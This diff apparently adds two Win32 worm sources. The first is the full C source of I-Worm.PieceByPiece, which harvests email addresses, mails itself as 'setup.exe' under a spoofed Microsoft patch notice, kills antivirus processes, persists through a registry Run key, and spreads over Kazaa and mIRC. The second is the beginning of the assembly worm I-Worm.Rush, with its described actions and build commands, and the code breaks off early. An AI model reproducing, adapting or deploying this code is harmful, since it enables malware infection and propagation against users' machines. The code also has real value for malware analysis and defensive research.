Add files via upload

Win32/I-Worm.PieceByPiece.c

@@ -0,0 +1,878 @@
+/*
+I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
+For educational purpose only. Distribute under GPL.
+Some lyrics from the song that inspired me:
+
+	"Cause nothing ever lasts forever
+	We're like flowers in this vase, together
+	You and me, it's pulling me down
+	Tearing my down, piece by piece
+	And you can't see
+	That's it's like a disease
+	Killing me now, it's so hard to breathe"
+					-Feeder <Piece by Piece>
+*/
+
+#include <winsock.h>
+#include <fstream.h>
+#include <tlhelp32.h>
+#include <string.h>
+#include <stdlib.h>
+
+//--------------------------------------GLOBAL VARIABLES-------------------------------------
+
+HWND hwnd;
+WORD version = MAKEWORD(1,1);
+WSADATA wsaData;
+int nRet;
+char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
+char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
+char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
+SOCKET theSocket;
+int i,err=0,c=0,connected=0,tim,sending=0;
+SYSTEMTIME time;
+double k;
+DWORD basesize,ProcessId;
+
+//--------------------------------------WNDPROC-----------------------------------------------
+
+LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
+
+//--------------------------------------GETASC------------------------------------------------
+
+int getasc(char chr[1]) {
+int i=0;
+char c[1];
+
+for (i=0;i<257;i++) {
+c[0]=i;
+if (chr[0]==c[0]) { return(i); }
+}
+}
+
+//--------------------------------------BASE64-----------------------------------------------
+
+void base64(char *file) { //Encodes a file using the "base 64" encoding
+WIN32_FIND_DATA fis;	 //It's kinna shitty code, but it works just GREAT!
+int i,j,n,done=0,k=0,lin=0;
+double c=0;
+char tmp[7];
+DWORD totsize;
+char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
+   
+    'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
+    
+    'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
+    
+    'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
+
+fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
+FindFirstFile(file,&fis);
+totsize=fis.nFileSizeLow;	 //Get the file size in bytes
+for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
+
+buc1[0]=0;
+xxx[0]=0;
+f.get(cx[1]);
+j=getasc(&cx[1]);
+itoa(j,cx2,2);
+if (strlen(cx2)<8) {
+for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
+buc1[i]=0;
+strcat(buc1,cx2);
+} else strcpy(buc1,cx2);
+buc2[0]=0;
+f.get(cx[1]);
+j=getasc(&cx[1]);
+itoa(j,cx2,2);
+if (strlen(cx2)<8) {
+for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
+buc2[i]=0;
+strcat(buc2,cx2);
+} else strcpy(buc2,cx2);
+buc3[0]=0;
+f.get(cx[1]);
+j=getasc(&cx[1]);
+itoa(j,cx2,2);
+if (strlen(cx2)<8) {
+for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
+buc3[i]=0;
+strcat(buc3,cx2);
+} else strcpy(buc3,cx2);
+xxx[0]=0;
+strcpy(xxx,buc1);
+done=0;
+k=0;
+while (done!=24) {
+	for (i=done;i<done+6;i++) {
+	tmp[k]=xxx[i];
+	k++;
+	}
+tmp[k]=0;
+done+=6;
+n=strtol(tmp,NULL,2);
+g<<base[n];
+lin++;
+if (lin==76) {
+	g<<endl;lin=0;
+}
+tmp[0]=0;
+k=0;
+}
+
+}
+
+//One char left so add 4 0s at the end
+if (totsize%3==1) {
+buc1[0]=0;
+f.get(cx[1]);
+j=getasc(&cx[1]);
+itoa(j,cx2,2);
+if (strlen(cx2)<8) {
+for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
+buc1[i]=0;
+strcat(buc1,cx2);
+} else strcpy(buc1,cx2);
+strcat(buc1,"0000");
+done=0;
+k=0;
+while (done!=12) {
+	for (i=done;i<done+6;i++) {
+	tmp[k]=buc1[i];
+	k++;
+	}
+tmp[k]=0;
+done+=6;
+n=strtol(tmp,NULL,2);
+g<<base[n];
+lin++;
+if (lin==76) {
+	g<<endl;lin=0;
+}
+tmp[0]=0;
+k=0;
+}
+g<<"==";
+}
+
+//Two chars left so add 2 0s at the end
+if (totsize%3==2) {
+buc1[0]=0;
+f.get(cx[1]);
+j=getasc(&cx[1]);
+itoa(j,cx2,2);
+if (strlen(cx2)<8) {
+for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
+buc1[i]=0;
+strcat(buc1,cx2);
+} else strcpy(buc1,cx2);
+strcat(buc1,"00");
+done=0;
+k=0;
+while (done!=18) {
+	for (i=done;i<done+6;i++) {
+	tmp[k]=buc1[i];
+	k++;
+	}
+tmp[k]=0;
+done+=6;
+n=strtol(tmp,NULL,2);
+g<<base[n];
+lin++;
+if (lin==76) {
+	g<<endl;lin=0;
+}
+tmp[0]=0;
+k=0;
+}
+g<<"=";
+}
+
+f.close();
+g.close();
+//Get the size of the encoded file
+FindFirstFile("C:\\Msbootlog.sys",&fis);
+basesize=fis.nFileSizeLow;
+}
+//--------------------------------------SENDMAIL---------------------------------------------
+
+void sendmail() { //Sends an e-mail with MIME encoding
+int ran;
+
+sending=1;
+//"HELO" the server
+strcpy(myBuf, "HELO <");
+strcat(myBuf,helo);
+strcat(myBuf,">\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+recv(theSocket,Buf,sizeof(Buf),0);
+
+if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
+strcpy(myBuf, "MAIL FROM:<");
+strcat(myBuf,email);
+strcat(myBuf,">\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+recv(theSocket,Buf,sizeof(Buf),0);
+}
+if (Buf[0]=='4' || Buf[0]=='5') err=1;
+
+if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
+
+GetSystemTime(&time);
+srand(time.wSecond);
+ran=rand();
+while (ran>c) {
+srand(c);
+ran=ran-rand();
+}
+if (ran<0) ran=ran*(-1);
+strcpy(myBuf, "RCPT TO:<");
+strcat(myBuf, emails[ran]);
+strcat(myBuf, ">\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+recv(theSocket,Buf,sizeof(Buf),0);
+}
+if (Buf[0]=='4' || Buf[0]=='5') err=1;
+
+if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
+strcpy(myBuf, "DATA\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+recv(theSocket,Buf,sizeof(Buf),0);
+}
+if (Buf[0]=='4' || Buf[0]=='5') err=1;
+
+if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
+
+if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
+	strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
+	send(theSocket,myBuf,strlen(myBuf),0);
+
+	strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
+	send(theSocket,myBuf,strlen(myBuf),0);
+
+	strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
+	send(theSocket,myBuf,strlen(myBuf),0);
+} else { //if we find a new address
+	strcpy(myBuf, "From: <");
+	strcat(myBuf, email);
+	strcat(myBuf, ">\x0d\x0a");
+	send(theSocket,myBuf,strlen(myBuf),0);
+
+	strcpy(myBuf, "Subject: Hello\x0d\x0a");
+	send(theSocket,myBuf,strlen(myBuf),0); 
+
+}
+
+strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "    boundary = \"bla\"\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "X-Priority: 3\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "--bla\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "--bla\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "    name = \"setup.exe\"\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "    filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+//Send the file byte by byte
+fstream f("C:\\Msbootlog.sys",ios::in);
+for (k=0;k<basesize;k++) {
+f.get(ch[1]);
+strcpy(myBuf,&ch[1]);
+send(theSocket,myBuf,strlen(myBuf),0);
+}
+f.close();
+
+strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+
+recv(theSocket,Buf,sizeof(Buf),0);
+}
+if (Buf[0]=='4' || Buf[0]=='5') err=1;
+
+strcpy(myBuf, "QUIT\x0d\x0a");
+send(theSocket,myBuf,strlen(myBuf),0);
+}
+
+//--------------------------------------GETPROCESSMODULE------------------------------------
+
+BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
+     LPMODULEENTRY32 lpMe32, DWORD cbMe32) 
+{ 
+    BOOL          bRet        = FALSE; 
+    BOOL          bFound      = FALSE; 
+    HANDLE        hModuleSnap = NULL; 
+    MODULEENTRY32 me32        = {0}; 
+ 
+    hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID); 
+    if (hModuleSnap == (HANDLE)-1) 
+        return (FALSE); 
+ 
+    me32.dwSize = sizeof(MODULEENTRY32); 
+ 
+   if (Module32First(hModuleSnap, &me32)) 
+    { 
+        do 
+        { 
+            if (me32.th32ModuleID == dwModuleID) 
+            { 
+                CopyMemory (lpMe32, &me32, cbMe32); 
+                bFound = TRUE; 
+            } 
+        } 
+        while (!bFound && Module32Next(hModuleSnap, &me32)); 
+ 
+        bRet = bFound;  
+    } 
+    else 
+        bRet = FALSE;
+    CloseHandle (hModuleSnap); 
+ 
+    return (bRet); 
+} 
+
+//--------------------------------------PROCESSES---------------------------------------------
+
+BOOL processes() //Various stuff with processes
+{ 
+    HANDLE         hProcessSnap = NULL; 
+    BOOL           bRet      = FALSE; 
+    PROCESSENTRY32 pe32      = {0}; 
+	
+    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
+    if (hProcessSnap == (HANDLE)-1) 
+        return (FALSE); 
+    pe32.dwSize = sizeof(PROCESSENTRY32); 
+    if (Process32First(hProcessSnap, &pe32)) 
+    { 
+        DWORD         dwPriorityClass; 
+        BOOL          bGotModule = FALSE; 
+        MODULEENTRY32 me32       = {0}; 
+        do 
+        { 
+            bGotModule = GetProcessModule(pe32.th32ProcessID, 
+                pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32)); 
+            if (bGotModule) 
+            { 
+                HANDLE hProcess; 
+                hProcess = OpenProcess (PROCESS_ALL_ACCESS, 
+                    FALSE, pe32.th32ProcessID); 
+                dwPriorityClass = GetPriorityClass (hProcess); 
+				//Get the virus' filename
+				if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
+												
+				//Anti AVs
+				if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
+					TerminateProcess(hProcess,0); 
+					}
+                
+				//Close the handle
+				CloseHandle (hProcess); 
+            }
+        } 
+        while (Process32Next(hProcessSnap, &pe32)); 
+        bRet = TRUE; 
+    } 
+    else 
+        bRet = FALSE;
+    CloseHandle (hProcessSnap); 
+    return (bRet); 
+} 
+
+//--------------------------------------FINDSERVER--------------------------------------------
+
+void findserver() { //Gets a SMTP server and user name from the registry (if possible)
+int i,j;
+char key2[256];
+unsigned char acc[1024],smtp[1024],eml[1024];
+DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
+HKEY hKey;
+
+//Try getting a SMTP server from registry
+strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
+RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
+RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
+RegCloseKey(hKey);
+strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
+j=strlen(key2);
+for (i=0;i<8;i++){
+key2[j+i]=acc[i];
+}
+key2[j+i]=0;
+RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
+RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
+RegCloseKey(hKey);
+if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
+i=0;							//the new one
+while (smtp[i]!=0) {
+	server[i]=smtp[i]; //Now this is the SMTP server
+	i++;	
+	}
+server[i]=0;
+//Get the e-mail
+RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
+RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
+RegCloseKey(hKey);
+if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
+i=0;						  //the new one
+while (eml[i]!=0) {
+	email[i]=eml[i]; //Now this is the "FROM:" e-mail
+	i++;
+	}
+email[i]=0;
+}
+//Set a new "HELO" domain
+i=strlen(email)-1;
+j=0;
+while (email[i]!='@') {
+	helo[j]=email[i];
+	j++;
+	i--;
+	}
+}
+helo[j]=0;
+strrev(helo);
+//end
+}
+
+//--------------------------------------FINDMAIL----------------------------------------------
+
+void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
+{
+int ik,j=0;
+char lin[256],*start,ch[1];
+
+fstream f(file,ios::in);
+while (f.get(lin,256))
+{
+start=strstr(lin,"mailto:");
+if (start!=0)
+ {
+ j=0;
+ c++;
+ ik=start-lin+7;
+ ch[1]=lin[ik];
+ while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
+  {
+  emails[c][j]=ch[1];
+  j++;
+  ik++;
+  ch[1]=lin[ik];
+  }
+emails[c][j]=0;
+}
+f.get();
+}
+f.close();
+}
+
+//--------------------------------------FINDFILES---------------------------------------------
+
+void findfiles() { //Searches for .htm files in the temp. directories
+WIN32_FIND_DATA f;
+HANDLE hf;
+int k=0;
+char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
+
+strcpy(pth2,windir);
+strcat(pth2,"\\Temporary Internet Files\\*");
+hf=FindFirstFile(pth2,&f);
+if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
+while (FindNextFile(hf,&f)!=0 && k<20) {
+	if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
+	k++;
+}
+FindClose(hf);
+strcpy(pth2,windir);
+strcat(pth2,"\\Temporary Internet Files\\");
+strcat(pth2,pth1);
+strcat(pth2,"\\*");
+k=0;
+hf=FindFirstFile(pth2,&f);
+if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
+while (FindNextFile(hf,&f)!=0 && k<20) {
+	if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
+	k++;
+}
+FindClose(hf);
+strcpy(pth2,windir);
+strcat(pth2,"\\Temporary Internet Files\\");
+strcat(pth2,pth1);
+strcat(pth2,"\\");
+strcat(pth2,pth3);
+strcpy(pth,pth2);
+strcat(pth,"\\");
+strcat(pth2,"\\*.htm");
+k=0;
+hf=FindFirstFile(pth2,&f);
+while (FindNextFile(hf,&f)!=0 && k<70) {
+	if (f.cFileName[0]!='.') {
+		strcpy(path,pth);
+		strcat(path,f.cFileName);
+		findmail(path);
+	}
+	k++;
+}
+FindClose(hf);
+}
+
+//--------------------------------------CONECT------------------------------------------------
+
+int conect() { //Connects to a server using "Winsock"
+
+// Start up Winsock
+i=WSAStartup(version, &wsaData);
+if (i!=0) {return(0);}
+
+// Store information about the server
+LPHOSTENT lpHostEntry;
+
+lpHostEntry = gethostbyname(server);
+if (lpHostEntry == NULL) {
+WSACleanup();
+connected=0;
+return(0);
+} else connected=1; //This means we're connected
+//Get important data
+if (err==0) { //If we didn't run this allready and got an error
+	findserver();
+	findfiles();
+}
+// Create the socket
+theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);	
+if (theSocket == INVALID_SOCKET) {
+WSACleanup();
+connected=0;
+return(0);
+}
+
+SOCKADDR_IN saServer;
+saServer.sin_family = AF_INET;
+saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
+saServer.sin_port = htons(25);
+// Connect to the server
+nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));	
+if (nRet == SOCKET_ERROR) {
+WSACleanup();
+connected=0;
+return(0);
+}
+
+nRet = recv(theSocket,Buf,sizeof(Buf),0);			
+if (nRet == SOCKET_ERROR) {
+WSACleanup();
+connected=0;
+return(0);
+}
+
+if (Buf[0]=='4' || Buf[0]=='5') err=1;
+if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
+sendmail();
+}
+//Close the connection
+closesocket(theSocket);
+// Shutdown Winsock
+WSACleanup();
+}
+
+//--------------------------------------KAZAA-----------------------------------------------
+
+void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
+int i;
+char kaza[256],kfile[3][20];
+unsigned char kpth[1024];
+DWORD kpthlen=sizeof(kpth);
+HKEY hKey;
+
+//The filenames
+strcpy(kfile[0],"\\mirc6.exe");
+strcpy(kfile[1],"\\winamp3.exe");
+strcpy(kfile[2],"\\wincrack.exe");
+strcpy(kfile[3],"\\icq2002.exe");
+//Get the path to Kazaa from the reg.
+RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
+RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
+RegCloseKey(hKey);
+if (kpth[0]>64 && kpth[0]<123) {
+i=0;						
+while (kpth[i]!=0) {
+	kaza[i]=kpth[i];
+	i++;
+	}
+kaza[i]=0;
+}
+GetSystemTime(&time);
+srand(time.wSecond);
+if (rand()%5==0) strcat(kaza,kfile[3]);
+ else if (rand()%4==0) strcat(kaza,kfile[2]);
+  else if (rand()%3==0) strcat(kaza,kfile[1]);
+   else if (rand()%2==0) strcat(kaza,kfile[0]);
+CopyFile(file,kaza,FALSE);
+}
+
+//--------------------------------------INFECTWIN-------------------------------------------
+
+void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
+HKEY hKey;
+unsigned char val[256];
+char rnd[6];
+int i=0;
+
+strcpy(winbkup,windir);
+strcat(winbkup,"\\System\\winsys");
+GetSystemTime(&time);
+srand(time.wSecond);
+itoa(rand(),rnd,10);
+strcat(winbkup,rnd);
+strcat(winbkup,".exe");
+//Copy file to Windows
+CopyFile(file,winbkup,TRUE);
+//Just in case there is no WinZip, use this path
+strcpy(zippth,winbkup);
+//Now make Windows run it at startup
+while (winbkup[i]!=0) {
+	val[i]=winbkup[i];
+	i++;
+	}
+val[i]=0;
+RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
+RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
+RegCloseKey(hKey);
+}
+
+//--------------------------------------MIRC--------------------------------------------------
+
+void mirc() { //Creates a mIRC script
+HKEY hKey;
+unsigned char mircpth[1024];
+char mirc[MAX_PATH];
+int i=0;
+DWORD mircpthlen=sizeof(mircpth);
+
+//Get the path from our friend: the registry :)
+RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
+RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
+RegCloseKey(hKey);
+i=1;
+while (mircpth[i]!=0 && mircpth[i]!='.') {
+	mirc[i-1]=mircpth[i];
+	i++;
+	}
+mirc[i-1]=0;
+i=strlen(mirc);
+while (mirc[i]!=92) {
+	mirc[i]=0;
+	i--;
+	}
+strcat(mirc,"script.ini");
+//Write a new script.ini
+fstream f(mirc,ios::out);
+f<<"[Script]"<<endl;
+f<<"n0=ON 1:JOIN:#:{"<<endl;
+f<<"n1=/dcc send $nick "<<zippth<<endl;
+f<<"n2=}"<<endl;
+f<<"n3=on 1:start:{"<<endl;
+f<<"n4= /join #piecebypiece"<<endl;
+f<<"n5=}"<<endl;
+f.close();
+
+}
+
+//--------------------------------------ZIPIT-------------------------------------------------
+
+void zipit(char *file) { //Zips the virus with a random name
+HKEY hKey;
+unsigned char zip[1024];
+char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
+int i=0;
+DWORD ziplen=sizeof(zip);
+
+//Get the path from the registry
+i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
+if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
+RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
+RegCloseKey(hKey);
+i=0;
+while (zip[i]!=0) {
+	zippath[i]=zip[i];
+	i++;
+	}
+zippath[i]=0;
+//Make a random filename for the .zip file
+strcpy(zippth,windir);
+strcat(zippth,"\\System\\win32sys");
+GetSystemTime(&time);
+srand(time.wSecond);
+itoa(rand(),rnd,10);
+strcat(zippth,rnd);
+strcat(zippth,".zip");
+//Zip it!
+strcpy(param," -a -r ");
+strcat(param,zippth);
+strcat(param," ");
+strcat(param,file);
+ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
+} else strcpy(zippth,file); //Else just use the executable file for mIRC
+
+}
+
+//--------------------------------------TIMERPROC---------------------------------------------
+
+VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
+	
+if (sending==0) { //Check for a connection if a mail is not under delivery
+	conect();
+	if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
+		strcpy(server,"smtp.barrysworld.com");
+		strcpy(email,"john@barrysworld.com");
+		strcpy(helo,"barrysworld.com");
+		conect();
+		}
+	if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
+	}
+}
+
+//--------------------------------------PAYLOAD-----------------------------------------------
+void payload() { //Every virus MUST have a payload ;)
+MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
+}
+
+//--------------------------------------------------------------------------------------------
+//Main function
+//--------------------------------------------------------------------------------------------
+
+int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
+WNDCLASSEX wndc;
+MSG msg; 	
+HKEY hKey;
+unsigned char buf[1024],inf[]="yes";
+DWORD buflen=sizeof(buf);
+int first=0;
+
+//Create a window
+wndc.cbClsExtra = 0;
+wndc.cbSize = sizeof(wndc);
+wndc.cbWndExtra = 0;
+wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
+wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
+wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
+wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
+wndc.hInstance = hInstance;
+wndc.lpfnWndProc = WndProc;
+wndc.lpszClassName = "ClassName";
+wndc.lpszMenuName = NULL;
+wndc.style = CS_HREDRAW|CS_VREDRAW;
+RegisterClassEx(&wndc);
+hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
+UpdateWindow(hwnd);
+//Hide the window
+ShowWindow(hwnd,SW_HIDE);
+//Get the filename and disable (if possible) any AVs
+GetWindowThreadProcessId(hwnd,&ProcessId);
+processes();
+GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
+//Check if the comp. was infected before
+RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
+RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
+RegCloseKey(hKey);
+if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
+{
+RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
+//Create a key in the registry to mark the PC as infected
+RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
+RegCloseKey(hKey);
+//----INFECT COMPUTER----
+infectwin(filename);
+kazaa(filename);
+zipit(winbkup);
+mirc();
+base64(filename);
+conect();
+first=1;
+MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
+}
+base64(filename);
+GetSystemTime(&time);
+if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
+if (first==0) {
+	base64(filename); //Write a "base64" encoded file every time (just in case)
+	conect(); //Try to connect
+	if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
+		strcpy(server,"smtp.barrysworld.com");
+		strcpy(email,"john@barrysworld.com");
+		strcpy(helo,"barrysworld.com");
+		conect();
+		}
+}
+if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
+
+while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
+	TranslateMessage(&msg);
+	DispatchMessage(&msg);
+}
+return msg.wParam;
+//end of main()
+}
+
+//--------------------------------------WNDPROC----------------------------------------------
+
+LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
+	HDC hdc;
+	PAINTSTRUCT ps;
+
+	switch(iMsg){
+	case WM_PAINT:
+		hdc = BeginPaint(hwnd,&ps);
+		EndPaint(hwnd,&ps);
+		return 0;
+	case WM_DESTROY:
+		PostQuitMessage(0);
+		return 0;
+	}
+	return DefWindowProc(hwnd,iMsg,wParam,lParam);
+}
+//That's all folks! e-mail to: MI_pirat@yahoo.com , web: 

Win32/I-Worm.Rush.asm

@@ -0,0 +1,498 @@
+comment #
+Name : I-Worm.Rush
+Author : PetiK
+Date : August 27th - September 2nd
+Size : 5632 byte (compiled with UPX tool)
+
+Action : Copy itself to
+		* WINDOWS\SYSTEM\Mail32.exe
+	 Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
+		* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
+
+	 * On Wednesday it opens the cdrom
+	 * The 3rd it produces a sound
+	 * the 15th it alters "Search Page", "Start Page", and "Local Page" by 
+	 * Creates %personal%\Read_Me.txt with a text
+	 * A vbs file search all email in the Oultook software and put them in the Mailbook.txt.
+	   The worm scans the file to find email.
+
+		Subject	: New Scan Virus...
+		Body 	: Hi man,
+			  I send you the last update of ScanVir (v 2.5).
+			  Look at the file attached.
+
+			  		Bye and have a nice day.
+
+		Attached : ScanVir_25.exe
+
+	 * Scans title of windows :
+		- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
+		- System Properties => Minimize the window
+
+
+To build the worm:
+@echo off
+tasm32 /ml /m9 Rush
+tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
+upx -9 Rush.exe
+if exist *.obj del *.obj
+if exist *.map del *.map
+
+To delete the worm:
+del %windir%\system\Mail32.exe
+del %personal%\Read_Me.txt
+del %windir%\MailBook.txt
+
+#
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+callx macro a
+extrn a:proc
+call a
+endm
+
+include useful.inc
+include myinclude.inc
+
+start:
+	;call hide_worm
+
+twin_worm:
+	push  50
+	mov   esi,offset orig_worm
+	push  esi
+	push  0
+	callx GetModuleFileNameA
+
